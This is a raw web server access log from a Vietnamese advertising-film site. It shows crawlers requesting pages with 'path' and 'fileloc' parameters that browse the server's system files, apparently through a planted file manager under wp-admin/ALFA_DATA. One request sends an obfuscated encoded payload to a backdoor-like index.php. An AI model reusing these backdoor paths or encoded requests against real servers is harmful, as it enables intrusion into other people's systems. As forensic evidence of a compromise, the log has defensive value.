File: /var/www/lamphim/data/logs/lamphimquangcao.net-frontend.access.log
216.73.216.50 - - [10/Nov/2025:00:00:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2FALFA_DATA%2Falfasymlink%2Froot%2Fproc%2F98%2Fnet%2Figmp6&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2FALFA_DATA%2Falfasymlink%2Froot%2Fproc%2F98%2Fnet HTTP/1.1" 200 2786 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:05 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Flibmbim-glib4%2Fchangelog.Debian.gz&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Flibmbim-glib4 HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:05 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fsound%2Ffirewire%2Fdigi00x HTTP/1.1" 200 3018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fx86_64-linux-gnu%2Flibfreebl3.so&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fx86_64-linux-gnu HTTP/1.1" 200 2655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fbus%2Fpci%2Fdrivers%2Fvirtio-pci%2F0000%3A00%3A05.0%2Ffirmware_node%2Fphysical_node%2Fsubsystem%2Fslots%2F26%2Flatch&path=%2F%2Fsys%2Fbus%2Fpci%2Fdrivers%2Fvirtio-pci%2F0000%3A00%3A05.0%2Ffirmware_node%2Fphysical_node%2Fsubsystem%2Fslots%2F26 HTTP/1.1" 200 2717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.3 - - [10/Nov/2025:00:00:06 +0000] "GET /?products=1843002906 HTTP/1.1" 200 32870 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.167.32.123 - - [10/Nov/2025:00:00:06 +0000] "GET /our-works/tvc-kimino/?path=//var/snap/snapd/common HTTP/1.1" 200 2675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:07 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput5%2Fdevice%2Finput%2Finput4%2Fsubsystem%2Finput3 HTTP/1.1" 200 3465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:07 +0000] "GET /5vlb48821.html?fileloc=//bin/unshare&path=//bin HTTP/1.1" 200 2593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:07 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fde2104x HTTP/1.1" 200 3036 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:00:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory5 HTTP/1.1" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.243.63.52 - - [10/Nov/2025:00:00:08 +0000] "GET /our-works/tvc-relax-gaba/?path=//var/lib/dpkg/parts HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg%2Fb_tblanalyse.png&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg HTTP/1.1" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fdevices%2Fpci0000%3A00%2F0000%3A00%3A01.0%2Ffirmware_node%2FPNP0B00%3A00%2Fphysical_node%2Fdriver%2F00%3A04%2Fid&path=%2F%2Fsys%2Fdevices%2Fpci0000%3A00%2F0000%3A00%3A01.0%2Ffirmware_node%2FPNP0B00%3A00%2Fphysical_node%2Fdriver%2F00%3A04 HTTP/1.1" 200 2701 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:10 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fary HTTP/1.1" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:10 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fmodule%2Fasync_memcpy%2Fholders%2Fraid456%2Fsections%2F.text.unlikely&path=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fmodule%2Fasync_memcpy%2Fholders%2Fraid456%2Fsections HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fkernel%2Fslab%2Ffile_lock_cache%2Faliases&path=%2F%2Fproc%2Fthread-self%2Froot%2Fsys%2Fkernel%2Fslab%2Ffile_lock_cache HTTP/1.1" 200 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:11 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3.9%2Flib2to3 HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:11 +0000] "GET /5vlb48821.html?fileloc=//bin/date&path=//bin HTTP/1.1" 200 2593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:12 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Finput4%2Fdevice%2Finput%2Finput4%2Fdevice%2Fdriver%2Fmodule%2Fuevent&path=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Finput4%2Fdevice%2Finput%2Finput4%2Fdevice%2Fdriver%2Fmodule HTTP/1.1" 200 2694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.70.123.241 - - [10/Nov/2025:00:00:12 +0000] "GET /our-works/tvc-kimino/?path=//sys/kernel/slab/fib6_nodes HTTP/1.1" 200 4025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:00:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory4 HTTP/1.1" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg%2Fb_sbrowse.png&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:13 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2Fcmd HTTP/1.1" 200 3347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Finput3%2Fsubsystem%2Fevent4%2Fsubsystem%2Finput1%2Finput1%3A%3Acapslock%2Fdevice%2Fuevent&path=%2F%2Fsys%2Fclass%2Finput%2Finput3%2Fsubsystem%2Fevent4%2Fsubsystem%2Finput1%2Finput1%3A%3Acapslock%2Fdevice HTTP/1.1" 200 2967 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg%2Fs_loggoff.png&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fthemes%2Foriginal%2Fimg HTTP/1.1" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:15 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Fnet%2Fopenvswitch HTTP/1.1" 200 3036 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fssl%2Fcerts%2F9c8dfbd4.0&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fssl%2Fcerts HTTP/1.1" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [10/Nov/2025:00:00:15 +0000] "GET / HTTP/1.1" 200 4544 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:15 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fsys%2Fmodule%2Fasync_tx%2Fnotes%2F.note.Linux&path=%2F%2Fsys%2Fmodule%2Fasync_tx%2Fnotes HTTP/1.1" 200 2646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:16 +0000] "GET /5vlb48821.html?fileloc=//bin/cat&path=//bin HTTP/1.1" 200 2592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.210.152.179 - - [10/Nov/2025:00:00:16 +0000] "GET /our-works/intracom-riverside/?path=//run/udev/tags HTTP/1.1" 200 3071 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:00:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory7 HTTP/1.1" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fssl%2Fcerts%2FCertainly_Root_R1.pem&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fssl%2Fcerts HTTP/1.1" 200 4243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:17 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fxz-utils%2Fextra HTTP/1.1" 200 3030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:17 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput5%2Fevent3%2Fdevice%2Fmouse1%2Fdevice%2Fsubsystem%2Finput0%2Fdevice%2Finput HTTP/1.1" 200 2998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:17 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Ffile HTTP/1.1" 200 2978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:18 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fmodules%2Fuse HTTP/1.1" 200 2972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:18 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fmouse%2Fps2%2Falps.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fmouse%2Fps2 HTTP/1.1" 200 2702 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:18 +0000] "GET /our-works/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-2k%2Fobjs_per_slab&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-2k HTTP/1.1" 200 2637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.223.193.255 - - [10/Nov/2025:00:00:19 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/locale/es HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:00:19 +0000] "GET /77pge2387.html?path=//srv HTTP/1.1" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:00:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory1/power HTTP/1.1" 200 3400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1k%2Fcgroup%2Fkmalloc-1k%28838%3Adovecot.service%29%2Ftotal_objects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1k%2Fcgroup%2Fkmalloc-1k%28838%3Adovecot.service%29 HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fcifs%2Fdebug.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fcifs HTTP/1.1" 200 2694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsys%2Fclass%2Fblock%2Floop1%2Fsubsystem%2Floop0%2Fqueue%2Fdax&path=%2F%2Fproc%2Fself%2Froot%2Fsys%2Fclass%2Fblock%2Floop1%2Fsubsystem%2Floop0%2Fqueue HTTP/1.1" 200 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:21 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Ffs%2Fcgroup%2Fblkio%2Fsystem.slice%2Fphp7.4-fpm.service HTTP/1.1" 200 3440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fsnd%2Fsoc%2Fcs4349.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fsnd%2Fsoc HTTP/1.1" 200 2701 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:21 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fsystemd%2Fcatalog HTTP/1.1" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fdrm%2Fdrm_modeset_helper.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fdrm HTTP/1.1" 200 3587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.225.81.20 - - [10/Nov/2025:00:00:22 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//sys/module/thermal HTTP/1.1" 200 3019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:00:23 +0000] "GET /5vlb48821.html?fileloc=//bin/sg_opcodes&path=//bin HTTP/1.1" 200 2597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fzoneinfo%2FAsia%2FDili&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fzoneinfo%2FAsia HTTP/1.1" 200 2653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:24 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Fdrivers%2Finput HTTP/1.1" 200 3366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fzoneinfo%2Fposix%2FWET&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fzoneinfo%2Fposix HTTP/1.1" 200 2654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1k%2Fcgroup%2Fkmalloc-1k%281137%3Audisks2.service%29%2Faliases&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1k%2Fcgroup%2Fkmalloc-1k%281137%3Audisks2.service%29 HTTP/1.1" 200 2668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Finput%2Fevent0%2Fdevice%2Fdevice%2Finput%2Finput0%2Fsubsystem%2Finput3%2Fevent2%2Fdev&path=%2F%2Fsys%2Fclass%2Finput%2Fevent0%2Fdevice%2Fdevice%2Finput%2Finput0%2Fsubsystem%2Finput3%2Fevent2 HTTP/1.1" 200 2688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Finfo%2Fhtml%2F_002d_002dshow_002doptions.html&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Finfo%2Fhtml HTTP/1.1" 200 3787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fdovecot%2Flibdovecot.so.0&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fdovecot HTTP/1.1" 200 2648 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:00:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory2/power HTTP/1.1" 200 3403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:26 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Farch%2Fopenrisc%2FKconfig&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Farch%2Fopenrisc HTTP/1.1" 200 4652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [10/Nov/2025:00:00:27 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733363330372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733323730372q3139613762396364653533383566636662363530626436353731333561366533222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:00:27 +0000] "GET /59wkd951.html?path=//bin HTTP/1.1" 200 34676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.197.114.76 - - [10/Nov/2025:00:00:27 +0000] "GET /our-works/tvc-calci/?path=//sys/kernel/slab/bio-2 HTTP/1.1" 200 4023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:28 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Flibjpeg8%2Fchangelog.Debian.gz&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Flibjpeg8 HTTP/1.1" 200 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:28 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fnetplan%2Fnetplan%2Fcli%2F__pycache__ HTTP/1.1" 200 3191 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
